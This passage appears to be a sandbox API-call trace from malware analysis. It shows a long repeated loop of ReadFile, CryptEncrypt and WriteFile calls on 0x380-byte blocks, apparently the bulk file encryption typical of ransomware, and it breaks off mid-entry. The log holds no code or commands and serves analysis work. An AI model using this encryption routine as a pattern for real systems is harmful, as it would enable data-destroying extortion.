CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.316] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.316] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.316] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.316] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.316] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.317] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.317] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.317] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.317] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.317] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.318] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.318] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.318] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.318] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.318] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.318] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.319] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.319] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.319] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.319] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.319] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.320] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.320] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.320] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.320] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.320] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.321] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.321] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.321] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.321] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.321] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.321] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.322] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.322] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.322] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.322] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.322] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.323] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.323] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, 